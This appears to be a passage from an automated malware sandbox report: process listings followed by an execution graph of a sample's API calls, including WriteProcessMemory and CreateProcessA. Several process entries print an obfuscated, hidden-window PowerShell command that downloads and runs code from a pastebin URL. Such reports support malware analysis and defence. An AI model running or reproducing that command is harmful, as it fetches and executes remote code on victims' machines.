                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                        Imagebase:0x7ff61a9c0000
                                                                        File size:52'224 bytes
                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:16
                                                                        Start time:10:00:29
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:10:00:29
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:18
                                                                        Start time:10:00:29
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:4.8%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:4.6%
                                                                          Total number of Nodes:1199
                                                                          Total number of Limit Nodes:11
                                                                          execution_graph 6744 7ff7ea0245a8 6745 7ff7ea0245d5 __except_validate_context_record 6744->6745 6746 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6745->6746 6750 7ff7ea0245da 6746->6750 6747 7ff7ea0246c2 6760 7ff7ea0246e1 6747->6760 6800 7ff7ea0230f0 6747->6800 6748 7ff7ea024634 6749 7ff7ea024688 6748->6749 6752 7ff7ea0246af 6748->6752 6754 7ff7ea02468d 6748->6754 6755 7ff7ea024656 6748->6755 6750->6747 6750->6748 6750->6749 6751 7ff7ea024730 6751->6749 6806 7ff7ea023d28 6751->6806 6791 7ff7ea022cf4 6752->6791 6754->6752 6759 7ff7ea024665 6754->6759 6767 7ff7ea02392c 6755->6767 6761 7ff7ea0247d9 6759->6761 6764 7ff7ea024677 6759->6764 6760->6749 6760->6751 6803 7ff7ea023104 6760->6803 6763 7ff7ea027b60 __GetCurrentState 47 API calls 6761->6763 6765 7ff7ea0247de 6763->6765 6772 7ff7ea024ab4 6764->6772 6768 7ff7ea02393a 6767->6768 6769 7ff7ea027b60 __GetCurrentState 47 API calls 6768->6769 6771 7ff7ea02394b 6768->6771 6770 7ff7ea023991 6769->6770 6771->6759 6773 7ff7ea0230f0 Is_bad_exception_allowed 58 API calls 6772->6773 6774 7ff7ea024ae3 6773->6774 6868 7ff7ea023888 6774->6868 6777 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6789 7ff7ea024b00 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 6777->6789 6778 7ff7ea024bf7 6779 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6778->6779 6781 7ff7ea024bfc 6779->6781 6780 7ff7ea024c32 6782 7ff7ea027b60 __GetCurrentState 47 API calls 6780->6782 6783 7ff7ea024c07 6781->6783 6784 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6781->6784 6782->6783 6785 7ff7ea024c14 __FrameHandler3::GetHandlerSearchState 6783->6785 6786 7ff7ea027b60 __GetCurrentState 47 API calls 6783->6786 6784->6783 6785->6749 6787 7ff7ea024c3d 6786->6787 6788 7ff7ea0230f0 58 API calls Is_bad_exception_allowed 6788->6789 6789->6778 6789->6780 6789->6788 6872 7ff7ea023118 6789->6872 6875 7ff7ea022d58 6791->6875 6798 7ff7ea024ab4 __FrameHandler3::FrameUnwindToEmptyState 58 API calls 6799 7ff7ea022d48 6798->6799 6799->6749 6801 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6800->6801 6802 7ff7ea0230f9 6801->6802 6802->6760 6804 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6803->6804 6805 7ff7ea02310d 6804->6805 6805->6751 6889 7ff7ea024c40 6806->6889 6808 7ff7ea027b60 __GetCurrentState 47 API calls 6809 7ff7ea0241f5 6808->6809 6810 7ff7ea024140 6846 7ff7ea0241ef 6810->6846 6854 7ff7ea02413e 6810->6854 6952 7ff7ea0241f8 6810->6952 6811 7ff7ea023e6e 6811->6810 6813 7ff7ea023ea6 6811->6813 6812 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6816 7ff7ea024182 6812->6816 6823 7ff7ea02406d 6813->6823 6917 7ff7ea022e28 6813->6917 6818 7ff7ea024189 6816->6818 6816->6846 6817 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6820 7ff7ea023dd5 6817->6820 6821 7ff7ea021e60 _log10_special 8 API calls 6818->6821 6820->6818 6824 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6820->6824 6825 7ff7ea024195 6821->6825 6822 7ff7ea02408e 6830 7ff7ea0240b0 6822->6830 6822->6854 6944 7ff7ea022cc8 6822->6944 6823->6822 6826 7ff7ea0230f0 Is_bad_exception_allowed 58 API calls 6823->6826 6823->6854 6827 7ff7ea023de5 6824->6827 6825->6749 6826->6822 6829 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6827->6829 6832 7ff7ea023dee 6829->6832 6831 7ff7ea0240c6 6830->6831 6830->6854 6865 7ff7ea0241d2 6830->6865 6833 7ff7ea0240d1 6831->6833 6836 7ff7ea0230f0 Is_bad_exception_allowed 58 API calls 6831->6836 6901 7ff7ea023130 6832->6901 6840 7ff7ea024cd8 58 API calls 6833->6840 6834 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6837 7ff7ea0241d8 6834->6837 6836->6833 6839 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6837->6839 6841 7ff7ea0241e1 6839->6841 6842 7ff7ea0240e8 6840->6842 6844 7ff7ea027b34 47 API calls 6841->6844 6847 7ff7ea022d58 __FrameHandler3::FrameUnwindToEmptyState 48 API calls 6842->6847 6842->6854 6843 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6845 7ff7ea023e30 6843->6845 6844->6846 6845->6811 6850 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6845->6850 6846->6808 6849 7ff7ea024102 6847->6849 6848 7ff7ea023104 58 API calls 6858 7ff7ea023ed5 6848->6858 6949 7ff7ea022f5c RtlUnwindEx 6849->6949 6852 7ff7ea023e3c 6850->6852 6855 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6852->6855 6854->6812 6856 7ff7ea023e45 6855->6856 6904 7ff7ea024cd8 6856->6904 6858->6823 6858->6848 6923 7ff7ea024468 6858->6923 6937 7ff7ea023c54 6858->6937 6861 7ff7ea023e59 6913 7ff7ea024dc8 6861->6913 6863 7ff7ea0241cc 6864 7ff7ea027b34 47 API calls 6863->6864 6864->6865 6865->6834 6866 7ff7ea023e61 __CxxCallCatchBlock std::bad_alloc::bad_alloc 6866->6863 6867 7ff7ea0233ec std::_Xinvalid_argument 2 API calls 6866->6867 6867->6863 6869 7ff7ea0238aa 6868->6869 6870 7ff7ea02389f 6868->6870 6869->6777 6871 7ff7ea02392c __GetCurrentState 47 API calls 6870->6871 6871->6869 6873 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6872->6873 6874 7ff7ea023126 6873->6874 6874->6789 6876 7ff7ea023924 __FrameHandler3::FrameUnwindToEmptyState 47 API calls 6875->6876 6877 7ff7ea022d86 6876->6877 6878 7ff7ea022db0 RtlLookupFunctionEntry 6877->6878 6879 7ff7ea022d13 6877->6879 6878->6877 6880 7ff7ea023924 6879->6880 6881 7ff7ea02392c 6880->6881 6882 7ff7ea027b60 __GetCurrentState 47 API calls 6881->6882 6884 7ff7ea022d21 6881->6884 6883 7ff7ea023991 6882->6883 6885 7ff7ea022c64 6884->6885 6886 7ff7ea022caf 6885->6886 6887 7ff7ea022c84 6885->6887 6886->6798 6887->6886 6888 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6887->6888 6888->6887 6890 7ff7ea023924 __FrameHandler3::FrameUnwindToEmptyState 47 API calls 6889->6890 6891 7ff7ea024c65 6890->6891 6892 7ff7ea022d58 __FrameHandler3::FrameUnwindToEmptyState 48 API calls 6891->6892 6893 7ff7ea024c7a 6892->6893 6970 7ff7ea0238b0 6893->6970 6896 7ff7ea024caf 6898 7ff7ea0238b0 __GetUnwindTryBlock 48 API calls 6896->6898 6897 7ff7ea024c8c __FrameHandler3::GetHandlerSearchState 6973 7ff7ea0238e8 6897->6973 6899 7ff7ea023d89 6898->6899 6899->6811 6899->6817 6899->6846 6902 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6901->6902 6903 7ff7ea02313e 6902->6903 6903->6843 6903->6846 6905 7ff7ea024dbf 6904->6905 6912 7ff7ea024d03 6904->6912 6907 7ff7ea027b60 __GetCurrentState 47 API calls 6905->6907 6906 7ff7ea023e55 6906->6811 6906->6861 6908 7ff7ea024dc4 6907->6908 6909 7ff7ea023104 58 API calls 6909->6912 6910 7ff7ea0230f0 Is_bad_exception_allowed 58 API calls 6910->6912 6911 7ff7ea024468 58 API calls 6911->6912 6912->6906 6912->6909 6912->6910 6912->6911 6914 7ff7ea024e35 6913->6914 6915 7ff7ea024de5 Is_bad_exception_allowed 6913->6915 6914->6866 6915->6914 6916 7ff7ea0230f0 58 API calls Is_bad_exception_allowed 6915->6916 6916->6915 6918 7ff7ea023924 __FrameHandler3::FrameUnwindToEmptyState 47 API calls 6917->6918 6919 7ff7ea022e66 6918->6919 6920 7ff7ea027b60 __GetCurrentState 47 API calls 6919->6920 6922 7ff7ea022e74 6919->6922 6921 7ff7ea022f58 6920->6921 6922->6858 6924 7ff7ea024495 6923->6924 6936 7ff7ea024524 6923->6936 6925 7ff7ea0230f0 Is_bad_exception_allowed 58 API calls 6924->6925 6926 7ff7ea02449e 6925->6926 6927 7ff7ea0230f0 Is_bad_exception_allowed 58 API calls 6926->6927 6928 7ff7ea0244b7 6926->6928 6926->6936 6927->6928 6929 7ff7ea0244e3 6928->6929 6930 7ff7ea0230f0 Is_bad_exception_allowed 58 API calls 6928->6930 6928->6936 6931 7ff7ea023104 58 API calls 6929->6931 6930->6929 6932 7ff7ea0244f7 6931->6932 6933 7ff7ea0230f0 Is_bad_exception_allowed 58 API calls 6932->6933 6934 7ff7ea024510 6932->6934 6932->6936 6933->6934 6935 7ff7ea023104 58 API calls 6934->6935 6935->6936 6936->6858 6938 7ff7ea022d58 __FrameHandler3::FrameUnwindToEmptyState 48 API calls 6937->6938 6939 7ff7ea023c91 6938->6939 6940 7ff7ea0230f0 Is_bad_exception_allowed 58 API calls 6939->6940 6941 7ff7ea023cc9 6940->6941 6942 7ff7ea022f5c 9 API calls 6941->6942 6943 7ff7ea023d0d 6942->6943 6943->6858 6945 7ff7ea023924 __FrameHandler3::FrameUnwindToEmptyState 47 API calls 6944->6945 6946 7ff7ea022cdc 6945->6946 6947 7ff7ea022c64 __FrameHandler3::FrameUnwindToEmptyState 58 API calls 6946->6947 6948 7ff7ea022ce6 6947->6948 6948->6830 6950 7ff7ea021e60 _log10_special 8 API calls 6949->6950 6951 7ff7ea023056 6950->6951 6951->6854 6953 7ff7ea024231 6952->6953 6954 7ff7ea024444 6952->6954 6955 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6953->6955 6954->6854 6956 7ff7ea024236 6955->6956 6957 7ff7ea024255 EncodePointer 6956->6957 6966 7ff7ea0242a8 6956->6966 6960 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6957->6960 6958 7ff7ea0242c8 6961 7ff7ea022e28 47 API calls 6958->6961 6959 7ff7ea02445f 6962 7ff7ea027b60 __GetCurrentState 47 API calls 6959->6962 6964 7ff7ea024265 6960->6964 6969 7ff7ea0242ea 6961->6969 6963 7ff7ea024464 6962->6963 6964->6966 6976 7ff7ea022c10 6964->6976 6966->6954 6966->6958 6966->6959 6967 7ff7ea0230f0 58 API calls Is_bad_exception_allowed 6967->6969 6968 7ff7ea023c54 60 API calls 6968->6969 6969->6954 6969->6967 6969->6968 6971 7ff7ea022d58 __FrameHandler3::FrameUnwindToEmptyState 48 API calls 6970->6971 6972 7ff7ea0238c3 6971->6972 6972->6896 6972->6897 6974 7ff7ea022d58 __FrameHandler3::FrameUnwindToEmptyState 48 API calls 6973->6974 6975 7ff7ea023902 6974->6975 6975->6899 6977 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6976->6977 6978 7ff7ea022c3c 6977->6978 6978->6966 6979 7ff7ea026dac 6980 7ff7ea026dc5 6979->6980 6981 7ff7ea026dc1 6979->6981 6982 7ff7ea029c04 67 API calls 6980->6982 6983 7ff7ea026dca 6982->6983 6994 7ff7ea02a160 GetEnvironmentStringsW 6983->6994 6986 7ff7ea026dd7 6988 7ff7ea0286b8 __free_lconv_num 11 API calls 6986->6988 6987 7ff7ea026de3 7014 7ff7ea026e20 6987->7014 6988->6981 6991 7ff7ea0286b8 __free_lconv_num 11 API calls 6992 7ff7ea026e0a 6991->6992 6993 7ff7ea0286b8 __free_lconv_num 11 API calls 6992->6993 6993->6981 6995 7ff7ea026dcf 6994->6995 6997 7ff7ea02a190 6994->6997 6995->6986 6995->6987 6996 7ff7ea02a080 WideCharToMultiByte 6998 7ff7ea02a1e1 6996->6998 6997->6996 6997->6997 6999 7ff7ea02a1e8 FreeEnvironmentStringsW 6998->6999 7000 7ff7ea0284ec 12 API calls 6998->7000 6999->6995 7001 7ff7ea02a1fb 7000->7001 7002 7ff7ea02a20c 7001->7002 7003 7ff7ea02a203 7001->7003 7005 7ff7ea02a080 WideCharToMultiByte 7002->7005 7004 7ff7ea0286b8 __free_lconv_num 11 API calls 7003->7004 7006 7ff7ea02a20a 7004->7006 7007 7ff7ea02a22f 7005->7007 7006->6999 7008 7ff7ea02a23d 7007->7008 7009 7ff7ea02a233 7007->7009 7010 7ff7ea0286b8 __free_lconv_num 11 API calls 7008->7010 7011 7ff7ea0286b8 __free_lconv_num 11 API calls 7009->7011 7012 7ff7ea02a23b FreeEnvironmentStringsW 7010->7012 7011->7012 7012->6995 7016 7ff7ea026e45 7014->7016 7015 7ff7ea028640 _set_fmode 11 API calls 7029 7ff7ea026e7b 7015->7029 7016->7015 7017 7ff7ea026e83 7018 7ff7ea0286b8 __free_lconv_num 11 API calls 7017->7018 7020 7ff7ea026deb 7018->7020 7019 7ff7ea026ef6 7021 7ff7ea0286b8 __free_lconv_num 11 API calls 7019->7021 7020->6991 7021->7020 7022 7ff7ea028640 _set_fmode 11 API calls 7022->7029 7023 7ff7ea026ee5 7033 7ff7ea026f30 7023->7033 7024 7ff7ea027bb8 __std_exception_copy 47 API calls 7024->7029 7027 7ff7ea0286b8 __free_lconv_num 11 API calls 7027->7017 7028 7ff7ea026f1b 7030 7ff7ea02670c _invalid_parameter_noinfo_noreturn 17 API calls 7028->7030 7029->7017 7029->7019 7029->7022 7029->7023 7029->7024 7029->7028 7031 7ff7ea0286b8 __free_lconv_num 11 API calls 7029->7031 7032 7ff7ea026f2e 7030->7032 7031->7029 7034 7ff7ea026eed 7033->7034 7035 7ff7ea026f35 7033->7035 7034->7027 7036 7ff7ea026f5e 7035->7036 7037 7ff7ea0286b8 __free_lconv_num 11 API calls 7035->7037 7038 7ff7ea0286b8 __free_lconv_num 11 API calls 7036->7038 7037->7035 7038->7034 7426 7ff7ea0236ac 7433 7ff7ea024f0c 7426->7433 7429 7ff7ea0236b9 7434 7ff7ea024f14 7433->7434 7436 7ff7ea024f45 7434->7436 7437 7ff7ea0236b5 7434->7437 7446 7ff7ea025208 7434->7446 7438 7ff7ea024f54 __vcrt_uninitialize_locks DeleteCriticalSection 7436->7438 7437->7429 7439 7ff7ea02381c 7437->7439 7438->7437 7451 7ff7ea0250dc 7439->7451 7447 7ff7ea024f8c __vcrt_InitializeCriticalSectionEx 5 API calls 7446->7447 7448 7ff7ea02523e 7447->7448 7449 7ff7ea025248 7448->7449 7450 7ff7ea025253 InitializeCriticalSectionAndSpinCount 7448->7450 7449->7434 7450->7449 7452 7ff7ea024f8c __vcrt_InitializeCriticalSectionEx 5 API calls 7451->7452 7453 7ff7ea025101 TlsAlloc 7452->7453 6563 7ff7ea02b530 6564 7ff7ea02b569 6563->6564 6565 7ff7ea02b53a 6563->6565 6565->6564 6566 7ff7ea02b54f FreeLibrary 6565->6566 6566->6565 6567 7ff7ea02f930 6568 7ff7ea02f968 __GSHandlerCheckCommon 6567->6568 6569 7ff7ea02f994 6568->6569 6571 7ff7ea023148 6568->6571 6578 7ff7ea023740 6571->6578 6574 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6575 7ff7ea02317f 6574->6575 6576 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6575->6576 6577 7ff7ea023188 6576->6577 6577->6569 6584 7ff7ea02375c 6578->6584 6581 7ff7ea023172 6581->6574 6582 7ff7ea027b60 __GetCurrentState 47 API calls 6583 7ff7ea023758 6582->6583 6585 7ff7ea02377b GetLastError 6584->6585 6586 7ff7ea023749 6584->6586 6598 7ff7ea02516c 6585->6598 6586->6581 6586->6582 6599 7ff7ea024f8c __vcrt_InitializeCriticalSectionEx 5 API calls 6598->6599 6600 7ff7ea025193 TlsGetValue 6599->6600 7039 7ff7ea02f9b0 7049 7ff7ea023494 7039->7049 7041 7ff7ea02f9d8 7043 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7044 7ff7ea02f9e8 7043->7044 7045 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7044->7045 7046 7ff7ea02f9f1 7045->7046 7047 7ff7ea027b34 47 API calls 7046->7047 7048 7ff7ea02f9fa 7047->7048 7051 7ff7ea0234c4 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 7049->7051 7050 7ff7ea0235c5 7050->7041 7050->7043 7051->7050 7052 7ff7ea023588 RtlUnwindEx 7051->7052 7052->7051 7455 7ff7ea0304b0 7458 7ff7ea0267dc 7455->7458 7459 7ff7ea02824c _set_fmode 11 API calls 7458->7459 7460 7ff7ea0267fa 7459->7460 7237 7ff7ea028434 7238 7ff7ea02843c 7237->7238 7239 7ff7ea02b350 6 API calls 7238->7239 7240 7ff7ea02846d 7238->7240 7241 7ff7ea028469 7238->7241 7239->7238 7243 7ff7ea028498 7240->7243 7244 7ff7ea0284c3 7243->7244 7245 7ff7ea0284c7 7244->7245 7246 7ff7ea0284a6 DeleteCriticalSection 7244->7246 7245->7241 7246->7244 6602 7ff7ea023720 6603 7ff7ea02373a 6602->6603 6604 7ff7ea023729 6602->6604 6604->6603 6605 7ff7ea02759c __std_exception_copy 13 API calls 6604->6605 6605->6603 7247 7ff7ea03061f 7250 7ff7ea024a30 7247->7250 7251 7ff7ea024a97 7250->7251 7252 7ff7ea024a4a 7250->7252 7252->7251 7253 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7252->7253 7253->7251 6606 7ff7ea022148 6609 7ff7ea022660 6606->6609 6610 7ff7ea022151 6609->6610 6611 7ff7ea022683 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6609->6611 6611->6610 7461 7ff7ea0306ca 7464 7ff7ea023350 7461->7464 7465 7ff7ea023368 7464->7465 7466 7ff7ea02337a 7464->7466 7465->7466 7467 7ff7ea023370 7465->7467 7468 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7466->7468 7470 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7467->7470 7473 7ff7ea023378 7467->7473 7469 7ff7ea02337f 7468->7469 7471 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7469->7471 7469->7473 7472 7ff7ea02339f 7470->7472 7471->7473 7474 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7472->7474 7475 7ff7ea0233ac 7474->7475 7476 7ff7ea027b34 47 API calls 7475->7476 7477 7ff7ea0233b5 7476->7477 7053 7ff7ea029fc8 GetCommandLineA GetCommandLineW 7254 7ff7ea02a848 7255 7ff7ea02a854 7254->7255 7257 7ff7ea02a87b 7255->7257 7258 7ff7ea02a37c 7255->7258 7259 7ff7ea02a381 7258->7259 7263 7ff7ea02a3bc 7258->7263 7260 7ff7ea02a3a2 DeleteCriticalSection 7259->7260 7261 7ff7ea02a3b4 7259->7261 7260->7260 7260->7261 7262 7ff7ea0286b8 __free_lconv_num 11 API calls 7261->7262 7262->7263 7263->7255 7264 7ff7ea027a4c 7265 7ff7ea027a7d 7264->7265 7266 7ff7ea027a65 7264->7266 7266->7265 7267 7ff7ea0286b8 __free_lconv_num 11 API calls 7266->7267 7267->7265 7054 7ff7ea024bd0 7064 7ff7ea024b03 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7054->7064 7055 7ff7ea024bf7 7056 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7055->7056 7058 7ff7ea024bfc 7056->7058 7057 7ff7ea024c32 7059 7ff7ea027b60 __GetCurrentState 47 API calls 7057->7059 7060 7ff7ea024c07 7058->7060 7062 7ff7ea023740 __CxxCallCatchBlock 58 API calls 7058->7062 7059->7060 7063 7ff7ea024c14 __FrameHandler3::GetHandlerSearchState 7060->7063 7065 7ff7ea027b60 __GetCurrentState 47 API calls 7060->7065 7061 7ff7ea0230f0 58 API calls Is_bad_exception_allowed 7061->7064 7062->7060 7064->7055 7064->7057 7064->7061 7067 7ff7ea023118 __FrameHandler3::FrameUnwindToEmptyState 58 API calls 7064->7067 7066 7ff7ea024c3d 7065->7066 7067->7064 6612 7ff7ea02cf50 6613 7ff7ea029c04 67 API calls 6612->6613 6614 7ff7ea02cf59 6613->6614 6105 7ff7ea021fd4 6128 7ff7ea02245c 6105->6128 6108 7ff7ea022120 6178 7ff7ea022788 IsProcessorFeaturePresent 6108->6178 6109 7ff7ea021ff0 __scrt_acquire_startup_lock 6111 7ff7ea02212a 6109->6111 6115 7ff7ea02200e __scrt_release_startup_lock 6109->6115 6112 7ff7ea022788 7 API calls 6111->6112 6114 7ff7ea022135 __GetCurrentState 6112->6114 6113 7ff7ea022033 6115->6113 6116 7ff7ea0220b9 6115->6116 6167 7ff7ea0273bc 6115->6167 6136 7ff7ea0228d0 6116->6136 6118 7ff7ea0220be 6139 7ff7ea026ff8 6118->6139 6125 7ff7ea0220e1 6125->6114 6174 7ff7ea0225e0 6125->6174 6129 7ff7ea022464 6128->6129 6130 7ff7ea022470 __scrt_dllmain_crt_thread_attach 6129->6130 6131 7ff7ea021fe8 6130->6131 6132 7ff7ea02247d 6130->6132 6131->6108 6131->6109 6185 7ff7ea027ae8 6132->6185 6228 7ff7ea02fa70 6136->6228 6138 7ff7ea0228e7 GetStartupInfoW 6138->6118 6230 7ff7ea029c04 6139->6230 6141 7ff7ea0220c6 6144 7ff7ea0211c0 6141->6144 6142 7ff7ea027007 6142->6141 6236 7ff7ea029fb4 6142->6236 6459 7ff7ea021920 6144->6459 6146 7ff7ea02126a MultiByteToWideChar 6473 7ff7ea021a80 6146->6473 6149 7ff7ea021920 51 API calls 6150 7ff7ea0213bb 6149->6150 6151 7ff7ea0213d2 6150->6151 6487 7ff7ea021bb0 6150->6487 6153 7ff7ea021bb0 51 API calls 6151->6153 6155 7ff7ea021466 6151->6155 6153->6155 6154 7ff7ea02155f GetProcAddress GetCurrentProcess WriteProcessMemory SleepEx CreateProcessA 6156 7ff7ea021678 MessageBoxA 6154->6156 6157 7ff7ea021653 WaitForSingleObject CloseHandle CloseHandle 6154->6157 6155->6154 6162 7ff7ea021912 6155->6162 6163 7ff7ea021694 6156->6163 6157->6163 6158 7ff7ea0266dc _invalid_parameter_noinfo_noreturn 47 API calls 6159 7ff7ea021918 6158->6159 6160 7ff7ea02190d 6501 7ff7ea0266dc 6160->6501 6162->6158 6163->6160 6164 7ff7ea0218cc 6163->6164 6165 7ff7ea021e60 _log10_special 8 API calls 6164->6165 6166 7ff7ea0218e2 6165->6166 6172 7ff7ea022914 GetModuleHandleW 6166->6172 6168 7ff7ea0273f4 6167->6168 6169 7ff7ea0273d3 6167->6169 6170 7ff7ea027b34 47 API calls 6168->6170 6169->6116 6171 7ff7ea0273f9 6170->6171 6173 7ff7ea022925 6172->6173 6173->6125 6176 7ff7ea0225f1 6174->6176 6175 7ff7ea0220f8 6175->6113 6176->6175 6177 7ff7ea0236d4 7 API calls 6176->6177 6177->6175 6179 7ff7ea0227ae _invalid_parameter_noinfo_noreturn __scrt_get_show_window_mode 6178->6179 6180 7ff7ea0227cd RtlCaptureContext RtlLookupFunctionEntry 6179->6180 6181 7ff7ea022832 __scrt_get_show_window_mode 6180->6181 6182 7ff7ea0227f6 RtlVirtualUnwind 6180->6182 6183 7ff7ea022864 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6181->6183 6182->6181 6184 7ff7ea0228b2 _invalid_parameter_noinfo_noreturn 6183->6184 6184->6111 6186 7ff7ea02b634 6185->6186 6187 7ff7ea022482 6186->6187 6195 7ff7ea02a80c 6186->6195 6187->6131 6189 7ff7ea0236d4 6187->6189 6190 7ff7ea0236dc 6189->6190 6191 7ff7ea0236e6 6189->6191 6207 7ff7ea023864 6190->6207 6191->6131 6206 7ff7ea02847c EnterCriticalSection 6195->6206 6197 7ff7ea02a81c 6198 7ff7ea02a3cc 53 API calls 6197->6198 6199 7ff7ea02a825 6198->6199 6200 7ff7ea02a614 55 API calls 6199->6200 6205 7ff7ea02a833 6199->6205 6202 7ff7ea02a82e 6200->6202 6201 7ff7ea0284d0 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 6203 7ff7ea02a83f 6201->6203 6204 7ff7ea02a704 GetStdHandle GetFileType 6202->6204 6203->6186 6204->6205 6205->6201 6208 7ff7ea0236e1 6207->6208 6209 7ff7ea023873 6207->6209 6211 7ff7ea024f54 6208->6211 6215 7ff7ea025124 6209->6215 6212 7ff7ea024f7f 6211->6212 6213 7ff7ea024f62 DeleteCriticalSection 6212->6213 6214 7ff7ea024f83 6212->6214 6213->6212 6214->6191 6219 7ff7ea024f8c 6215->6219 6220 7ff7ea025076 TlsFree 6219->6220 6225 7ff7ea024fd0 __vcrt_InitializeCriticalSectionEx 6219->6225 6221 7ff7ea024ffe LoadLibraryExW 6223 7ff7ea02509d 6221->6223 6224 7ff7ea02501f GetLastError 6221->6224 6222 7ff7ea0250bd GetProcAddress 6222->6220 6223->6222 6226 7ff7ea0250b4 FreeLibrary 6223->6226 6224->6225 6225->6220 6225->6221 6225->6222 6227 7ff7ea025041 LoadLibraryExW 6225->6227 6226->6222 6227->6223 6227->6225 6229 7ff7ea02fa60 6228->6229 6229->6138 6229->6229 6231 7ff7ea029c56 6230->6231 6232 7ff7ea029c11 6230->6232 6231->6142 6240 7ff7ea0281a8 6232->6240 6237 7ff7ea029f40 6236->6237 6238 7ff7ea029128 47 API calls 6237->6238 6239 7ff7ea029f64 6238->6239 6239->6142 6241 7ff7ea0281b9 FlsGetValue 6240->6241 6242 7ff7ea0281d4 FlsSetValue 6240->6242 6244 7ff7ea0281c6 6241->6244 6245 7ff7ea0281ce 6241->6245 6243 7ff7ea0281e1 6242->6243 6242->6244 6247 7ff7ea028640 _set_fmode 11 API calls 6243->6247 6246 7ff7ea027b60 __GetCurrentState 47 API calls 6244->6246 6250 7ff7ea0281cc 6244->6250 6245->6242 6248 7ff7ea028249 6246->6248 6249 7ff7ea0281f0 6247->6249 6251 7ff7ea02820e FlsSetValue 6249->6251 6252 7ff7ea0281fe FlsSetValue 6249->6252 6260 7ff7ea0298dc 6250->6260 6254 7ff7ea02821a FlsSetValue 6251->6254 6255 7ff7ea02822c 6251->6255 6253 7ff7ea028207 6252->6253 6256 7ff7ea0286b8 __free_lconv_num 11 API calls 6253->6256 6254->6253 6257 7ff7ea027e84 _set_fmode 11 API calls 6255->6257 6256->6244 6258 7ff7ea028234 6257->6258 6259 7ff7ea0286b8 __free_lconv_num 11 API calls 6258->6259 6259->6250 6283 7ff7ea029b4c 6260->6283 6262 7ff7ea029911 6298 7ff7ea0295dc 6262->6298 6265 7ff7ea02992e 6265->6231 6267 7ff7ea02993f 6268 7ff7ea029947 6267->6268 6270 7ff7ea029956 6267->6270 6269 7ff7ea0286b8 __free_lconv_num 11 API calls 6268->6269 6269->6265 6270->6270 6312 7ff7ea029c80 6270->6312 6273 7ff7ea029a52 6274 7ff7ea028620 _set_fmode 11 API calls 6273->6274 6276 7ff7ea029a57 6274->6276 6275 7ff7ea029aad 6278 